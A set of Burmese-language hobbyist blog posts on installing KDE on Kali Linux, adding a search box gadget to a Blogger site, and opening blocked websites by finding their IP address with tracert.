KDE Desktop Environment ကတော့ auto ပါလာတာမဟုက်ပေမဲ့ free download လုပ်ရုံနဲ့
သင့် Desktop ကိုပိုမိုဆန်းပြားသွားစေမှာပါ ဒါကတော့ ကျွန်တော့် Desktop ပါ

Terminal ကိုဖွင့်

root@kali:~# apt-get install kde-full

ဆိုရပါပြီ

ကျေးဇူးတင်ပါသည် 

0 မိမိ WEB SITE လေးမှာ SEARCH ENGINE BOX လေး ထည့်သွင်း အသုံးပြုချင်တဲ့ သူတွေ အတွက်ပါ။

ဒီ တစ်ခါလဲ ကျွန်တော်တို့ Web Site ၀ါသနာရှင် သူငယ်ချင်းများအတွက် Search Engine Box လှလှလေးကို မိမိ Site လေးမှာ ချိတ်ဆွဲချင်သောသူတွေ အတွက်ပါဗျာ။ကဲ ကျွန်တော် အောက်မှာ ပုံလေး နဲ့ တကွ ပြပေးထားပါတယ်ဗျာ။ကျွန်တော့ Site လေးမှာလဲ ချိတ်ဆွဲထားပါတယ်ဗျာ။


 1.Design
2.Page Elements
3.Add a Gadget
4.Html/Javascript ဆိုတဲ့ နေရာ ပေါ်လာပြီဆိုရင်တော့ ကျွန်တော် ပေးထားတဲ့ အပေါ်က Code ကို ကူးပြီး ထည့်ရမှာ ဖြစ်ပါတယ်။
5.Save လိုက်ပါ။ဒါဆိုရင် ကျွန်တော်တို့တွေ အပေါ်ကပုံလေး အတိုင်း မိမိ Site မှာ ချိတ်ဆွဲထားပြီးသား ဖြစ်သွားပါ့မယ်။သိပြီးသား လူတွေများ ရှိရင် တောင်းပန်ပါတယ်ဗျာ။မသိသေးသူများ အတွက် ရည်ရွယ်ပြီး ပြောပြခြင်းဖြစ်ပါတယ်ဗျာ။
(မှတ်ချက် - www.welcometoitbank.blogspot.com တို့လို နေရာမျိုးမှာ မိမိ Web Site ရဲ့ Link ကို ထည့်သွင်းရမှာ ဖြစ်ပါတယ်။#000000 နေရာမှာတော့ မိမိ စိတ်ကြိုက် အရောင်တွေရဲ့ Code ကိုထည့်သွင်း အသုံးပြုလို့ရပါတယ်နော်။သူငယ်ချင်းတွေ အားလုံး အဆင်ပြေကြပါစေလို့ ဆုတောင်းပေးလိုက်ပါတယ်ဗျာ။)
                                                                                                                                     ကြိုးစားလျက်.........!

0 CMD ကနေပိတ်ထားတဲ့ ဆိုဒ်တွေ ကျော်မယ်

http://www.akarphyoe.co.nr/
CMD အသုံးပြုပုံကိုတင်ပေးလိုက်ပါတယ်။ အခုပြန်လည်ဖော်ပြပေးရတာဝမ်းလည်းဝမ်သာပါတယ်။ ဘာကြောင့်လဲဆိုရင် ကိုယ်သိလိုက်တဲ့ပညာကို သူများနဲ့မျှဝေပေးတာဟာ ဓါးဟောင်းတစ်လက်ကိုထပ်ခါထပ်ခါ သွေးပေးသလိုပဲ မဟုတ်ပါလားခင်ဗျာ။

ပထမဆုံး Start Menu ထဲက Run ကိုသွားပါ။ ပြီးရင် cmd ရိုက်ထည့်ပြီးတော့ Ok သို့မဟုတ် Enter ခေါက်ပါ။ Menu တစ်ခုထွက်ကျလာပါလိမ့်မယ်။




အဲ့ဒီထွက်ကျလာတဲ့ Menu ထဲကိုဒီစာသား tracert နဲ့ ကိုယ်ကျော်မယ့်ဝက်ဆိုက် adress ကိုရိုက်ထည့်လိုက်ပါ။ ပြီးရင် Enter ခေါက်ပါ။ ဥပမာ tracert www.yahoo.com
အဲ့ဒါဆိုရင် ကိုယ်ဖွင့်ချင်တဲ့ဝက်ဆိုက်ရဲ့ IP Address နံပါတ်ရလာပါလိမ့်မယ်။ ရလာတဲ့နံပါတ်ကို Mozilla Firefox ကိုဖွင့်ပြီး အဲ့ဒီနံပါတ်ကိုရိုက်ထည့်ပါ။ ပြီးတော့ Enter ခေါက်ပါ။ အဲ့ဒါဆိုရင် သော့ခတ်ထားတဲ့ ၀က်ဆိုက်ပွင့်သွားပါလိမ့်မယ်။